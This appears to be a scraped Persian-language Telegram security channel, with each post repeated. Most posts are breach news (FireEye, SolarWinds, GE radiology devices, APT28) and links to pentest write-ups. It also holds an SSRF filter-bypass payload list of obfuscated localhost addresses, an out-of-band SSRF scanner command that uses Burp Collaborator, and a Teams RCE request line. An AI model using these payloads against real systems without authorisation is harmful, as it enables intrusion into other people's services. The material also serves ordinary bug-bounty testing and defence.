استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود
https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38
#php
#poi
#rce
@sec_nerd
https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38
#php
#poi
#rce
@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰
1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript
https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved
#dev
@sec_nerd
1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript
https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved
#dev
@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده
https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs
#scan
#enum
@sec_nerd
https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs
#scan
#enum
@sec_nerd
mega.nz
985.13 MB file on MEGA
SSRF Bypass list for localhost (127.0.0.1):
https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net
#ssrf
#bugbounty
#pentest
@sec_nerd
https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net
#ssrf
#bugbounty
#pentest
@sec_nerd
Linux ptrace introduction AKA injecting into sshd for fun
https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/
#linux
#pentest
@sec_nerd
https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/
#linux
#pentest
@sec_nerd
اطلاعات ۲۴۳ میلیون برزیلی در اثر اشتباه برنامه نویسان در اختیار هکرها قرار گرفت.
اطلاعات شهروندان از دیتابیسی بدست آمده است که برنامه نویسان یوزرنیم و پسورد اتصال به آن را در سورس کد وبسایت دولتی جا گذاشته بودند.
این سورس کد به مدت ۶ ماه در دسترس بوده است.
https://www.zdnet.com/article/data-of-243-million-brazilians-exposed-online-via-website-source-code/
#breach
#brazil
@sec_nerd
اطلاعات شهروندان از دیتابیسی بدست آمده است که برنامه نویسان یوزرنیم و پسورد اتصال به آن را در سورس کد وبسایت دولتی جا گذاشته بودند.
این سورس کد به مدت ۶ ماه در دسترس بوده است.
https://www.zdnet.com/article/data-of-243-million-brazilians-exposed-online-via-website-source-code/
#breach
#brazil
@sec_nerd
ZDNet
Data of 243 million Brazilians exposed online via website source code
The password to access a highly sensitive Ministry of Health database was stored inside a government site's source code.
حملات ترکیبی در شبکه های ویندوزی با بکارگیری شل های متاسپلویت و جمع آوری هش ها
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
#smb
#windows
#lateral_movement
#privesc
#msf
@sec_nerd
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
#smb
#windows
#lateral_movement
#privesc
#msf
@sec_nerd
104 دستگاه پزشکی شرکت جنرال الکتریک دارای اکانت های مخفی و پسوردهای دیفالت هستند.
این دستگاه ها شامل ام آر آی، سی تی اسکن ، ایکس ری و ... هستند که نام کاربری و پسوردهای یکسان دارند به هکرها اجازه میدهند به راحتی عملیات نفوذ خود را به انجام برسانند.
گزارش و لیست سرویس های آسیب پذیر:
https://www.cybermdx.com/vulnerability-research-disclosures/ge-radiology-modalities
#news
#vuln
@sec_nerd
این دستگاه ها شامل ام آر آی، سی تی اسکن ، ایکس ری و ... هستند که نام کاربری و پسوردهای یکسان دارند به هکرها اجازه میدهند به راحتی عملیات نفوذ خود را به انجام برسانند.
گزارش و لیست سرویس های آسیب پذیر:
https://www.cybermdx.com/vulnerability-research-disclosures/ge-radiology-modalities
#news
#vuln
@sec_nerd
CyberMDX
GE Radiology Vulnerability | CyberMDX
CyberMDX Research Team Discovers Vulnerability in GE LightSpeed, Revolution, and other CT, MRI, and X-Ray imaging systems
احتمالا گروه هکرهای روس APT28 مسئول نفوذ به ایمیل های پارلمان نروژ هستند.
این حمله که با بروت فورس کردن تعدادی از حساب های ایمیل پارلمان نروژ انجام شده با گمانه زنی های پلیس نروژ به گروه APT28 نسبت داده شده و گفته میشود این عملیات بخشی از عملیات گسترده تری ست که از سال ۲۰۱۹ آغاز شده است.
پسوردهای ضعیف باعث موفقیت این حمله شده.
هکرهای APT28 یا fancy bear به واحد اطلاعات ارتش روسیه (GRU) مرتبط است.
#russia
#apt28
#news
@sec_nerd
این حمله که با بروت فورس کردن تعدادی از حساب های ایمیل پارلمان نروژ انجام شده با گمانه زنی های پلیس نروژ به گروه APT28 نسبت داده شده و گفته میشود این عملیات بخشی از عملیات گسترده تری ست که از سال ۲۰۱۹ آغاز شده است.
پسوردهای ضعیف باعث موفقیت این حمله شده.
هکرهای APT28 یا fancy bear به واحد اطلاعات ارتش روسیه (GRU) مرتبط است.
#russia
#apt28
#news
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
آسیب پذیری RCE در microsoft teams
PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1
#microsoft
#rce
@sec_nerd
PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1
#microsoft
#rce
@sec_nerd
کشف آسیب پذیری SSRF در فیسبوک و دریافت جایزه 31500 دلاری
https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
#ssrf
#writeup
#facebook
@sec_nerd
https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
#ssrf
#writeup
@sec_nerd
Medium
How I made $31500 by submitting a bug to Facebook
How did I found SSRF in Facebook — the story of my first bug bounty
شرکت امنیتی FireEye هک شد!
طبق بیانیه رسمی فایرآی، این شرکت مورد حمله هکرها قرار گرفته است.
قسمتی از بیانیه ی منتشر شده از سوی CEO:
طبق تجربه 25 ساله در امنیت سایبری به این نتیجه رسیدم ما شاهد حمله ای بودیم که توسط هکرهایی با توانمندی بسیار بالا صورت گرفته است. این حمله از هزاران حمله دیگر متفاوت است و هکرها توانمندی های سطح جهانی خود را برای حمله به ما بهبود بخشیدند. آنها بسیار آموزش دیده و در نظم و تمرکز فعالیت کردند. استفاده از روش های ضد ابزارهای امنیتی و فارنزیک جزیی از این حمله بوده است و ما تا بحال شاهد چنین تکنیک هایی نبوده ایم.
با همکاری FBI و برخی شرکایمان مثل مایکروسافت فهمیدیم هکرها توانستند برخی ابزارهای تیم های قرمز ما را که برای تست امنیت مشتریانمان مورد استفاده قرار میگرفتند بدست آورند. این ابزارها حاوی اکسپلویت های زیرودی نیستند.
تا این لحظه هیچ نشانه ای از استفاده از ابزارهایمان توسط هکرها مشاهده نشده است.
ادامه:
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
#fireeye
#news
#breach
#usa
@sec_nerd
طبق بیانیه رسمی فایرآی، این شرکت مورد حمله هکرها قرار گرفته است.
قسمتی از بیانیه ی منتشر شده از سوی CEO:
طبق تجربه 25 ساله در امنیت سایبری به این نتیجه رسیدم ما شاهد حمله ای بودیم که توسط هکرهایی با توانمندی بسیار بالا صورت گرفته است. این حمله از هزاران حمله دیگر متفاوت است و هکرها توانمندی های سطح جهانی خود را برای حمله به ما بهبود بخشیدند. آنها بسیار آموزش دیده و در نظم و تمرکز فعالیت کردند. استفاده از روش های ضد ابزارهای امنیتی و فارنزیک جزیی از این حمله بوده است و ما تا بحال شاهد چنین تکنیک هایی نبوده ایم.
با همکاری FBI و برخی شرکایمان مثل مایکروسافت فهمیدیم هکرها توانستند برخی ابزارهای تیم های قرمز ما را که برای تست امنیت مشتریانمان مورد استفاده قرار میگرفتند بدست آورند. این ابزارها حاوی اکسپلویت های زیرودی نیستند.
تا این لحظه هیچ نشانه ای از استفاده از ابزارهایمان توسط هکرها مشاهده نشده است.
ادامه:
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
#fireeye
#news
#breach
#usa
@sec_nerd
Trellix
Platform | Trellix Stories
Trellix XDR, get the latest cybersecurity trends, best practices, security vulnerabilities, and more from industry leaders.
https://github.com/Damian89/simple-oob-scanner
https://github.com/Damian89/extended-ssrf-search
python3 simple-oob-scanner.py -b https://burpcollaborator.net -u listdomain.txt -t 25 -to 10 -m POST
#SSRF #bugbounty #web #pentest
@sec_nerd
https://github.com/Damian89/extended-ssrf-search
python3 simple-oob-scanner.py -b https://burpcollaborator.net -u listdomain.txt -t 25 -to 10 -m POST
#SSRF #bugbounty #web #pentest
@sec_nerd
GitHub
GitHub - Damian89/simple-oob-scanner: Simple tool to test for SSRF/OOB HTTP Read within the Path of a request
Simple tool to test for SSRF/OOB HTTP Read within the Path of a request - GitHub - Damian89/simple-oob-scanner: Simple tool to test for SSRF/OOB HTTP Read within the Path of a request
How I Hacked Scammers with whole windows server takeover by RDP
https://basu-banakar.medium.com/how-i-hacked-scammers-with-whole-windows-server-takeover-by-rdp-42f95b05387f
#writeup
#pentest
@sec_nerd
https://basu-banakar.medium.com/how-i-hacked-scammers-with-whole-windows-server-takeover-by-rdp-42f95b05387f
#writeup
#pentest
@sec_nerd
حمله بزرگ سایبری به شرکتهای اسراییلی
این حمله که به گفته ی اسرائیلی ها در ماه اخیر رخ داده است سرورهای شرکت amital را هدف قرار داده که این سرورها حداقل 40 عدد میباشند.
تحقیقات نشان میدهد این حمله محدود به amital نیست و بیش از ۲۰ شرکت دیگر نیز مورد نفوذ هکرها قرار گرفته اند.
گفته میشود هکرهای ایرانی عامل این حملات هستند.
https://www.timesofisrael.com/israels-supply-chain-targeted-in-massive-cyberattack/
#breach
#news
#IRAN
#israel
@sec_nerd
این حمله که به گفته ی اسرائیلی ها در ماه اخیر رخ داده است سرورهای شرکت amital را هدف قرار داده که این سرورها حداقل 40 عدد میباشند.
تحقیقات نشان میدهد این حمله محدود به amital نیست و بیش از ۲۰ شرکت دیگر نیز مورد نفوذ هکرها قرار گرفته اند.
گفته میشود هکرهای ایرانی عامل این حملات هستند.
https://www.timesofisrael.com/israels-supply-chain-targeted-in-massive-cyberattack/
#breach
#news
#IRAN
#israel
@sec_nerd
The Times of Israel
Cyberattack hits Israeli companies, with Iran reportedly the likely culprit
Over 40 firms suffered data grab earlier this month; breach made public after one, Orian, reported incident to Tel Aviv Stock Exchange
هکرها با حمله به Solarwinds موفق شدند با آلوده کردن پکیج آپدیت سرویس Orion این شرکت، شبکه های دولتی و کمپانی های امریکایی را هک کنند.
نهادهای دولتی امریکایی شامل وزارت خزانه داری و اداره ی مخابرات و اطلاعات ملی (NTIA) از اهداف این حمله بوده اند.
فایرآی در گزارش خود اعلام کرد که نفوذ به زنجیره تامین solarwinds باعث هک شدن این شرکت شده است.
واشنگتن پست به منابعی اشاره میکند که مدعی اند آژانس های دولت های مختلفی در این عملیات ضربه خورده اند.
برخی نیز این عملیات را به گروه هکرهای APT29 نسبت میدهند. این گروه وابسته به سازمان اطلاعات خارجی روسیه می باشد. اما فایرآی این انتساب را تایید نمیکند و کد UNC2452 را برای این گروه در نظر گرفته است.
این هکرها با نفوذ به solarwinds در برنامه ی Orion که یک پلتفرم برای مدیریت منابع شبکه و دستگاه های متصل به آن در شبکه های بزرگ است، بدافزاری قرار دادند که نام آن توسط فایرآی SUNBURST گذاشته شده و مایکروسافت آن را Solorigate می نامد.
گزارش کامل فایرآی را اینجا بخوانید:
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
گزارش مایکروسافت از جزییات بدافزار:
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132
گزارش solarwinds:
https://www.solarwinds.com/securityadvisory
خلاصه خبر:
https://www.zdnet.com/article/microsoft-fireeye-confirm-solarwinds-supply-chain-attack/
#news
#usa
#fireeye
#solarwinds
#malware
#breach
@sec_nerd
نهادهای دولتی امریکایی شامل وزارت خزانه داری و اداره ی مخابرات و اطلاعات ملی (NTIA) از اهداف این حمله بوده اند.
فایرآی در گزارش خود اعلام کرد که نفوذ به زنجیره تامین solarwinds باعث هک شدن این شرکت شده است.
واشنگتن پست به منابعی اشاره میکند که مدعی اند آژانس های دولت های مختلفی در این عملیات ضربه خورده اند.
برخی نیز این عملیات را به گروه هکرهای APT29 نسبت میدهند. این گروه وابسته به سازمان اطلاعات خارجی روسیه می باشد. اما فایرآی این انتساب را تایید نمیکند و کد UNC2452 را برای این گروه در نظر گرفته است.
این هکرها با نفوذ به solarwinds در برنامه ی Orion که یک پلتفرم برای مدیریت منابع شبکه و دستگاه های متصل به آن در شبکه های بزرگ است، بدافزاری قرار دادند که نام آن توسط فایرآی SUNBURST گذاشته شده و مایکروسافت آن را Solorigate می نامد.
گزارش کامل فایرآی را اینجا بخوانید:
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
گزارش مایکروسافت از جزییات بدافزار:
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132
گزارش solarwinds:
https://www.solarwinds.com/securityadvisory
خلاصه خبر:
https://www.zdnet.com/article/microsoft-fireeye-confirm-solarwinds-supply-chain-attack/
#news
#usa
#fireeye
#solarwinds
#malware
#breach
@sec_nerd
Telegram
امنیت اطلاعات
شرکت امنیتی FireEye هک شد!
طبق بیانیه رسمی فایرآی، این شرکت مورد حمله هکرها قرار گرفته است.
قسمتی از بیانیه ی منتشر شده از سوی CEO:
طبق تجربه 25 ساله در امنیت سایبری به این نتیجه رسیدم ما شاهد حمله ای بودیم که توسط هکرهایی با توانمندی بسیار بالا صورت گرفته…
طبق بیانیه رسمی فایرآی، این شرکت مورد حمله هکرها قرار گرفته است.
قسمتی از بیانیه ی منتشر شده از سوی CEO:
طبق تجربه 25 ساله در امنیت سایبری به این نتیجه رسیدم ما شاهد حمله ای بودیم که توسط هکرهایی با توانمندی بسیار بالا صورت گرفته…